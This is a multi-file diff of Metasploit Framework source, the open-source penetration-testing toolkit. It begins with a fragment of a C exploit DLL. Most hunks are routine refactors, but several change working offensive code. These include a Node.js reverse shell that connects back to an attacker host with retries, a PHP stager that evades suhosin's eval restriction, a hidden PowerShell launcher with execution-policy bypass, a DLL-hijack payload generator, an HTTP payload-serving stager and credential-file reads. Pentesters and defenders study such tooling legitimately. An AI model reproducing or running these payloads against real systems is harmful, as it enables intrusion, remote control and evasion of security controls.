CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
}

View File

@ -0,0 +1,3 @@
EXPORTS
DllMain@12

View File

@ -0,0 +1,11 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";
typedef struct {
HANDLE hModule;
HANDLE hMutex;
HANDLE hProcess;
} EXPLOIT_DATA, *PEXPLOIT_DATA;
#define SIDSTR_SYSTEM _T("s-1-5-18")
#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)

View File

@ -0,0 +1,18 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23

View File

@ -634,8 +634,8 @@ module Metasploit
if idx > 0
encryption_mode = resp[idx, 1].unpack("C")[0]
else
raise RunTimeError, "Unable to parse encryption req. "\
"from server during prelogin"
framework_module.print_error("Unable to parse encryption req " \
"during pre-login, this may not be a MSSQL server")
encryption_mode = ENCRYPT_NOT_SUP
end
@ -682,8 +682,9 @@ module Metasploit
if idx > 0
encryption_mode = resp[idx, 1].unpack("C")[0]
else
raise RuntimeError, "Unable to parse encryption "\
"req during pre-login"
framework_module.print_error("Unable to parse encryption req " \
"during pre-login, this may not be a MSSQL server")
encryption_mode = ENCRYPT_NOT_SUP
end
end
encryption_mode

View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.16.8"
VERSION = "4.16.18"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

View File

@ -165,6 +165,7 @@ class ReadableText
output << " Name: #{mod.name}\n"
output << " Module: #{mod.fullname}\n"
output << " Platform: #{mod.platform_to_s}\n"
output << " Arch: #{mod.arch_to_s}\n"
output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n"
output << " License: #{mod.license}\n"
output << " Rank: #{mod.rank_to_s.capitalize}\n"
@ -275,11 +276,20 @@ class ReadableText
# Authors
output << "Provided by:\n"
mod.each_author { |author|
mod.each_author.each do |author|
output << indent + author.to_s + "\n"
}
end
output << "\n"
# Compatible session types
if mod.session_types
output << "Compatible session types:\n"
mod.session_types.sort.each do |type|
output << indent + type.capitalize + "\n"
end
output << "\n"
end
# Actions
if mod.action
output << "Available actions:\n"
@ -539,6 +549,7 @@ class ReadableText
columns = []
columns << 'Id'
columns << 'Name'
columns << 'Type'
columns << 'Checkin?' if show_extended
columns << 'Enc?' if show_extended
@ -562,6 +573,7 @@ class ReadableText
row = []
row << session.sid.to_s
row << session.sname.to_s
row << session.type.to_s
if session.respond_to?(:session_type)
row[-1] << (" " + session.session_type)
@ -617,6 +629,7 @@ class ReadableText
sess_info = session.info.to_s
sess_id = session.sid.to_s
sess_name = session.sname.to_s
sess_tunnel = session.tunnel_to_s + " (#{session.session_host})"
sess_via = session.via_exploit.to_s
sess_type = session.type.to_s
@ -647,6 +660,7 @@ class ReadableText
end
out << " Session ID: #{sess_id}\n"
out << " Name: #{sess_name}\n"
out << " Type: #{sess_type}\n"
out << " Info: #{sess_info}\n"
out << " Tunnel: #{sess_tunnel}\n"

View File

@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*')
session.core.set_session_guid(guid)
session.session_guid = guid
# TODO: New statgeless session, do some account in the DB so we can track it later.
# TODO: New stageless session, do some account in the DB so we can track it later.
else
# TODO: This session was either staged or previously known, and so we shold do some accounting here!
# TODO: This session was either staged or previously known, and so we should do some accounting here!
end
unless datastore['AutoLoadStdapi'] == false

View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_PPCE500V2
end
end
end
end

View File

@ -27,7 +27,7 @@ module Scriptable
# Scan all of the path combinations
check_paths.each { |path|
if ::File.exist?(path)
if ::File.file?(path)
full_path = path
break
end
@ -150,7 +150,7 @@ module Scriptable
# session
local_exploit_opts = local_exploit_opts.merge(opts)
new_session = mod.exploit_simple(
mod.exploit_simple(
'Payload' => local_exploit_opts.delete('payload'),
'Target' => local_exploit_opts.delete('target'),
'LocalInput' => self.user_input,

View File

@ -17,6 +17,7 @@ class Msf::Author
KNOWN = {
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'anonymous' => 'Unknown',
'aushack' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
@ -39,7 +40,6 @@ class Msf::Author
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',

View File

@ -547,17 +547,17 @@ module Auxiliary::AuthBrute
end
def vprint_status(msg='')
print_brute :level => :vstatus
print_brute :level => :vstatus, :msg => msg
end
def vprint_error(msg='')
print_brute :level => :verror
print_brute :level => :verror, :msg => msg
end
alias_method :vprint_bad, :vprint_error
def vprint_good(msg='')
print_brute :level => :vgood
print_brute :level => :vgood, :msg => msg
end
# Provides a consistant way to display messages about AuthBrute-mixed modules.

View File

@ -43,7 +43,7 @@ def rport
end
def set_nmap_cmd
self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
self.nmap_bin || (raise "Cannot locate nmap binary")
nmap_set_log
nmap_add_ports
nmap_cmd = [self.nmap_bin]
@ -54,7 +54,7 @@ def set_nmap_cmd
end
def get_nmap_ver
self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
self.nmap_bin || (raise "Cannot locate nmap binary")
res = ""
nmap_cmd = [self.nmap_bin]
nmap_cmd << "--version"
@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil)
end
def nmap_build_args
raise RuntimeError, "nmap_build_args() not defined by #{self.refname}"
raise "nmap_build_args() not defined by #{self.refname}"
end
def nmap_run
@ -159,13 +159,13 @@ end
# A helper to add in rport or rports as a -p argument
def nmap_add_ports
if not nmap_validate_rports
raise RuntimeError, "Cannot continue without a valid port list."
raise "Cannot continue without a valid port list."
end
port_arg = "-p \"#{datastore['RPORT'] || rports}\""
if nmap_validate_arg(port_arg)
self.nmap_args << port_arg
else
raise RunTimeError, "Argument is invalid"
raise "Argument is invalid"
end
end
@ -237,7 +237,7 @@ end
# module to ferret out whatever's interesting in this host
# object.
def nmap_hosts(&block)
@nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.")
@nmap_bin || (raise "Cannot locate the nmap binary.")
fh = self.nmap_log[0]
nmap_data = fh.read(fh.stat.size)
# fh.unlink

View File

@ -44,7 +44,7 @@ module Msf::DBManager::Report
unless artifact.valid?
errors = artifact.errors.full_messages.join('; ')
raise RuntimeError "Artifact to be imported is not valid: #{errors}"
raise "Artifact to be imported is not valid: #{errors}"
end
artifact.save
end
@ -66,7 +66,7 @@ module Msf::DBManager::Report
unless report.valid?
errors = report.errors.full_messages.join('; ')
raise RuntimeError "Report to be imported is not valid: #{errors}"
raise "Report to be imported is not valid: #{errors}"
end
report.state = :complete # Presume complete since it was exported
report.save
@ -83,4 +83,4 @@ module Msf::DBManager::Report
wspace.reports
}
end
end
end

View File

@ -27,9 +27,25 @@ module Http
end
def on_request_uri(cli, request)
if request['User-Agent'] =~ /^(?:Wget|curl)/
client = cli.peerhost
if (user_agent = request.headers['User-Agent'])
client << " (#{user_agent})"
end
print_status("Client #{client} requested #{request.raw_uri}")
if stager_instance.respond_to?(:user_agent)
agent_regex = stager_instance.user_agent
else
agent_regex = /.*/
end
if user_agent =~ agent_regex
print_status("Sending payload to #{client}")
send_response(cli, exe)
else
print_status("Sending 404 to #{client}")
send_not_found(cli)
end
end

View File

@ -138,6 +138,28 @@ module Exploit::EXE
dll
end
def generate_payload_dccw_gdiplus_dll(opts = {})
return get_custom_exe unless datastore['EXE::Custom'].to_s.strip.empty?
return get_eicar_exe if datastore['EXE::EICAR']
exe_init_options(opts)
plat = opts[:platform]
pl = opts[:code]
pl ||= payload.encoded
#Ensure opts[:arch] is an array
opts[:arch] = [opts[:arch]] unless opts[:arch].kind_of? Array
if opts[:arch] && opts[:arch].index(ARCH_X64)
dll = Msf::Util::EXE.to_win64pe_dccw_gdiplus_dll(framework, pl, opts)
else
dll = Msf::Util::EXE.to_win32pe_dccw_gdiplus_dll(framework, pl, opts)
end
exe_post_generation(opts)
dll
end
def generate_payload_msi(opts = {})
return get_custom_exe(datastore['MSI::Custom']) unless datastore['MSI::Custom'].to_s.strip.empty?
return get_eicar_exe if datastore['MSI::EICAR']

View File

@ -96,8 +96,14 @@ module Exploit::Remote::Ftp
# This method handles disconnecting our data channel
#
def data_disconnect
self.datasocket.shutdown if self.datasocket
self.datasocket = nil
begin
if datasocket
datasocket.shutdown
datasocket.close
end
rescue IOError
end
datasocket = nil if datasocket
end
#
@ -213,7 +219,7 @@ module Exploit::Remote::Ftp
if (type == "get")
# failed listings just disconnect..
begin
data = self.datasocket.get_once(-1, ftp_timeout)
data = datasocket.get(ftp_timeout, ftp_data_timeout)
rescue ::EOFError
data = nil
end
@ -335,6 +341,13 @@ module Exploit::Remote::Ftp
(datastore['FTPTimeout'] || 10).to_i
end
#
# Returns the number of seconds to wait to get more FTP data
#
def ftp_data_timeout
(datastore['FTPDataTimeout'] || 1).to_i
end
protected
#

View File

@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient
# Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
#
# @return (see Rex::Proto::Http::Client#send_recv))
def send_request_cgi(opts={}, timeout = 20)
def send_request_cgi(opts={}, timeout = 20, disconnect = true)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout']
else
@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20)
print_line(res.to_terminal_output)
end
disconnect(c)
disconnect(c) if disconnect
res
rescue ::Errno::EPIPE, ::Timeout::Error => e
print_line(e.message) if datastore['HttpTrace']

View File

@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param pass [String] Password
# @param redirect URL [String] to redirect after successful login
# @return [Hash] The post data for vars_post Parameter
def wordpress_helper_login_post_data(user, pass, redirect=nil)
def wordpress_helper_login_post_data(user, pass, redirect = nil)
post_data = {
'log' => user.to_s,
'pwd' => pass.to_s,
'redirect_to' => redirect.to_s,
'wp-submit' => 'Login'
'log' => user.to_s,
'pwd' => pass.to_s,
'redirect_to' => redirect.to_s,
'wp-submit' => 'Login'
}
post_data
end
@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @return [String,nil] The location of the new comment/post, nil on error
def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
vars_post = {
'comment' => comment,
'submit' => 'Post+Comment',
'comment_post_ID' => comment_post_id.to_s,
'comment_parent' => '0'
'comment' => comment,
'submit' => 'Post+Comment',
'comment_post_ID' => comment_post_id.to_s,
'comment_parent' => '0'
}
vars_post.merge!({
'author' => author,
'email' => email,
'url' => url,
'author' => author,
'email' => email,
'url' => url
}) unless login_cookie
options = {
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
'method' => 'POST'
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
'method' => 'POST'
}
options.merge!({'vars_post' => vars_post})
options.merge!({'cookie' => login_cookie}) if login_cookie
options.merge!({ 'vars_post' => vars_post })
options.merge!({ 'cookie' => login_cookie }) if login_cookie
res = send_request_cgi(options)
if res && res.redirect? && res.redirection
return wordpress_helper_parse_location_header(res)
@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
# @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
# @return [Integer,nil] The post id, nil when nothing found
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
range.each { |id|
vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param comments_enabled [Boolean] Check if comments are enabled on this post
# @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
# @return [String,nil] the HTTP response body of the post, nil otherwise
def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
options = {
'method' => 'GET',
'uri' => uri
'method' => 'GET',
'uri' => uri
}
options.merge!({'cookie' => login_cookie}) if login_cookie
options.merge!({ 'cookie' => login_cookie }) if login_cookie
res = send_request_cgi(options)
# post exists
if res and res.code == 200
if res && res.code == 200
# also check if comments are enabled
if comments_enabled
if res.body =~ /form.*action.*wp-comments-post\.php/
@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
#
# @param cookie [String] A valid admin session cookie
# @return [String,nil] The nonce, nil on error
def wordpress_helper_get_plugin_upload_nonce(cookie)
uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
options = {
'method' => 'GET',
'uri' => uri,
@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
res = send_request_cgi(options)
if res && res.code == 200
return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
elsif res && res.redirect? && res.redirection
path = wordpress_helper_parse_location_header(res)
return wordpress_helper_get_plugin_upload_nonce(cookie, path)
end
end
end

View File

@ -14,9 +14,11 @@ module Exploit::Powershell
OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]),
OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]),
OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]),
OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]),
OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]),
OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]])
]
@ -215,14 +217,13 @@ module Exploit::Powershell
# powershell script
# @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
# environment variable at the start of the command line
# @option opts [Boolean] :use_single_quotes Wraps the -Command
# argument in single quotes unless :encode_final_payload
# @option opts [Boolean] :wrap_double_quotes Wraps the -Command
# argument in double quotes unless :encode_final_payload
#
# @return [String] Powershell command line with payload
def cmd_psh_payload(pay, payload_arch, opts = {})
options.validate(datastore)
%i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt|
%i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload
remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt|
opts[opt] ||= datastore["Powershell::#{opt}"]
end

View File

@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver
unless res[0..2] == '235'
print_error("Authentication failed, quitting")
disconnect(nsock)
raise RuntimeError.new 'Could not authenticate to SMTP server'
raise 'Could not authenticate to SMTP server'
end
else
print_status("Server requested auth and no creds given, trying to continue anyway")
@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver
unless res[0..2] == '235'
print_error("Authentication failed, quitting")
disconnect(nsock)
raise RuntimeError.new 'Could not authenticate to SMTP server'
raise 'Could not authenticate to SMTP server'
end
else
print_status("Server requested auth and no creds given, trying to continue anyway")

View File

@ -247,6 +247,10 @@ protected
if session.respond_to?(:bootstrap)
session.bootstrap(datastore, self)
else
# Process the auto-run scripts for this session
if session.respond_to?(:process_autoruns)
session.process_autoruns(datastore)
end
on_session(session)
end

View File

@ -143,8 +143,7 @@ class Msf::Module::Platform
if (not mod.const_defined?('Names'))
elog("Failed to instantiate the platform list for module #{mod}")
raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}")
return nil
raise "Failed to instantiate the platform list for module #{mod}"
end
abbrev = mod.const_get('Abbrev')

View File

@ -41,7 +41,10 @@ class Msf::Payload::Apk
application = amanifest.xpath('//application')
application_name = application.attribute("name")
if application_name
return application_name.to_s
application_str = application_name.to_s
unless application_str == 'android.app.Application'
return application_str
end
end
activities = amanifest.xpath("//activity|//activity-alias")
for activity in activities
@ -221,7 +224,7 @@ class Msf::Payload::Apk
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
package = amanifest.xpath("//manifest").first['package']
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
classes = {}
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize

View File

@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -19,11 +19,11 @@ module Msf::Payload::NodeJS
var sh = cp.spawn(cmd, []);
socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
sh.stdout.pipe(socket);
sh.stderr.pipe(socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
util.pump(sh.stdout, socket);
util.pump(sh.stderr, socket);
}
});
server.listen(#{datastore['LPORT']});
@ -56,16 +56,27 @@ module Msf::Payload::NodeJS
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
var counter=0;
function StagerRepeat(){
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
socket.on("error", function(error) {
counter++;
if(counter<= #{datastore['StagerRetryCount']}){
setTimeout(function() { StagerRepeat();}, #{datastore['StagerRetryWait']}*1000);
} else
process.exit();
});
}
StagerRepeat();
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')

View File

@ -109,7 +109,15 @@ while (strlen($b) < $len) {
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
{
$suhosin_bypass=create_function('', $b);
$suhosin_bypass();
}
else
{
eval($b);
}
die();^
end

View File

@ -102,7 +102,15 @@ while (strlen($b) < $len) {
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
{
$suhosin_bypass=create_function('', $b);
$suhosin_bypass();
}
else
{
eval($b);
}
die();^
end

View File

@ -43,7 +43,8 @@ class Msf::Payload::UUID
24 => ARCH_AARCH64,
25 => ARCH_MIPS64,
26 => ARCH_PPC64LE,
27 => ARCH_R
27 => ARCH_R,
28 => ARCH_PPCE500V2
}
Platforms = {

View File

@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -44,7 +44,18 @@ module Payload::Windows::Powershell
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
command_args = {
noprofile: true,
windowstyle: 'hidden',
noninteractive: true,
executionpolicy: 'bypass'
}
cli = Rex::Powershell::Command.generate_psh_command_line(command_args)
return "#{cli} \"#{script}\""
end
def generate
command_string
end
end
end

View File

@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -29,9 +29,13 @@ class Msf::Post < Msf::Module
def setup
m = replicant
if m.actions.length > 0 && !m.action
raise Msf::MissingActionError, "Please use: #{m.actions.collect {|e| e.name} * ", "}"
end
# Msf::Module(Msf::PostMixin)#setup
super
end
def type

View File

@ -86,12 +86,18 @@ module System
version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "gentoo"
system_data[:version] = version
else
# Others
# Generic
elsif etc_files.include?("issue")
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "linux"
system_data[:version] = version
# Others, could be a mismatch like ssh_login to cisco device
else
system_data[:distro] = "linux"
system_data[:version] = ''
end
return system_data
end

View File

@ -40,14 +40,17 @@ module Msf::Post::Unix
#
def get_groups
groups = []
cmd_out = read_file("/etc/group").split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:gid] = user_field[2]
entry[:users] = user_field[3]
groups << entry
group = '/etc/group'
if file_exist?(group)
cmd_out = read_file(group).split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:gid] = user_field[2]
entry[:users] = user_field[3]
groups << entry
end
end
return groups
end
@ -59,8 +62,11 @@ module Msf::Post::Unix
user_dirs = []
# get all user directories from /etc/passwd
read_file("/etc/passwd").each_line do |passwd_line|
user_dirs << passwd_line.split(/:/)[5]
passwd = '/etc/passwd'
if file_exist?(passwd)
read_file(passwd).each_line do |passwd_line|
user_dirs << passwd_line.split(/:/)[5]
end
end
# also list other common places for home directories in the event that

View File

@ -119,7 +119,7 @@ module LDAP
domain ||= get_domain
if domain.blank?
raise RuntimeError, "Unable to find the domain to query."
raise "Unable to find the domain to query."
end
if load_extapi
@ -338,7 +338,7 @@ module LDAP
init_result = wldap32.ldap_sslinitA(domain, 389, 0)
session_handle = init_result['return']
if session_handle == 0
raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}")
raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}"
end
vprint_status("LDAP Handle: #{session_handle}")
@ -352,7 +352,7 @@ module LDAP
bind = bind_result['return']
unless bind == 0
wldap32.ldap_unbind(session_handle)
raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}")
raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}"
end
if (block_given?)

View File

@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv
#
def is_high_integrity?
il = get_integrity_level
(il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system])
(il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system])
end
#

View File

@ -78,7 +78,7 @@ module Services
# );
manag = advapi32.OpenSCManagerA(machine_str,nil,access)
if (manag["return"] == 0)
raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}")
raise "Unable to open service manager: #{manag["ErrorMessage"]}"
end
if (block_given?)
@ -115,7 +115,7 @@ module Services
def open_service_handle(manager, name, access)
handle = advapi32.OpenServiceA(manager, name, access)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}")
raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}"
end
if (block_given?)
@ -267,7 +267,7 @@ module Services
when "manual" then startup_number = START_TYPE_MANUAL
when "disable" then startup_number = START_TYPE_DISABLED
else
raise RuntimeError, "Invalid Startup Mode: #{mode}"
raise "Invalid Startup Mode: #{mode}"
end
end
@ -453,7 +453,7 @@ module Services
status = advapi32.QueryServiceStatus(service_handle,28)
if (status["return"] == 0)
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}")
raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}"
else
ret = parse_service_status_struct(status['lpServiceStatus'])
end
@ -485,7 +485,7 @@ module Services
vprint_good("[#{name}] Service started")
return true
else
raise RuntimeError, status
raise status
end
rescue RuntimeError => s
if tried

View File

@ -20,7 +20,8 @@ module Msf::PostMixin
] , Msf::Post)
# Default stance is active
self.passive = (info['Passive'] and info['Passive'] == true) || false
self.passive = info['Passive'] || false
self.session_types = info['SessionTypes'] || []
end
#
@ -38,7 +39,8 @@ module Msf::PostMixin
print_warning('SESSION may not be compatible with this module.')
end
super
# Msf::Exploit#setup for exploits, NoMethodError for post modules
super rescue NoMethodError
check_for_session_readiness() if session.type == "meterpreter"
@ -161,8 +163,8 @@ module Msf::PostMixin
return false if s.nil?
# Can't be compatible if it's the wrong type
if self.module_info["SessionTypes"]
return false unless self.module_info["SessionTypes"].include?(s.type)
if session_types
return false unless session_types.include?(s.type)
end
# Types are okay, now check the platform.
@ -189,9 +191,16 @@ module Msf::PostMixin
# @see passive?
attr_reader :passive
#
# A list of compatible session types
#
# @return [Array]
attr_reader :session_types
protected
attr_writer :passive
attr_writer :session_types
def session_changed?
@ds_session ||= datastore["SESSION"]

View File

@ -41,18 +41,19 @@ class Core
"-c" => [ true, "Run a command on the session given with -i, or all" ],
"-C" => [ true, "Run a Meterpreter Command on the session given with -i, or all" ],
"-h" => [ false, "Help banner" ],
"-i" => [ true, "Interact with the supplied session ID " ],
"-i" => [ true, "Interact with the supplied session ID" ],
"-l" => [ false, "List all active sessions" ],
"-v" => [ false, "List sessions in verbose mode" ],
"-q" => [ false, "Quiet mode" ],
"-k" => [ true, "Terminate sessions by session ID and/or range" ],
"-K" => [ false, "Terminate all sessions" ],
"-s" => [ true, "Run a script on the session given with -i, or all" ],
"-s" => [ true, "Run a script or module on the session given with -i, or all" ],
"-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ],
"-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ],
"-t" => [ true, "Set a response timeout (default: 15)" ],
"-S" => [ true, "Row search filter." ],
"-x" => [ false, "Show extended information in the session table" ])
"-S" => [ true, "Row search filter." ],
"-x" => [ false, "Show extended information in the session table" ],
"-n" => [ true, "Name or rename a session by ID" ])
@@threads_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ],
@ -138,10 +139,9 @@ class Core
def initialize(driver)
super
@dscache = {}
@cache_payloads = nil
@previous_module = nil
@module_name_stack = []
@previous_target = nil
@history_limit = 100
end
@ -1142,6 +1142,7 @@ class Core
reset_ring = false
response_timeout = 15
search_term = nil
session_name = nil
# any arguments that don't correspond to an option or option arg will
# be put in here
@ -1179,10 +1180,10 @@ class Core
sid = val || false
when "-K"
method = 'killall'
# Run a script on all meterpreter sessions
# Run a script or module on specified sessions
when "-s"
unless script
method = 'scriptall'
method = 'script'
script = val
end
# Upload and exec to the specific command session
@ -1204,8 +1205,9 @@ class Core
if val.to_s =~ /^\d+$/
response_timeout = val.to_i
end
when "-S", "--search"
search_term = val
when "-n", "--name"
method = 'name'
session_name = val
else
extra << val
end
@ -1387,15 +1389,11 @@ class Core
sid = nil
end
end
when 'scriptall'
when 'script'
unless script
print_error("No script specified!")
print_error("No script or module specified!")
return false
end
script_paths = {}
script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script)
script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script)
sessions = sid ? session_list : framework.sessions.keys.sort
sessions.each do |sess_id|
@ -1411,15 +1409,13 @@ class Core
session.response_timeout = response_timeout
end
begin
if script_paths[session.type]
print_status("Session #{sess_id} (#{session.session_host}):")
print_status("Running script #{script} on #{session.type} session" +
" #{sess_id} (#{session.session_host})")
begin
session.execute_file(script_paths[session.type], extra)
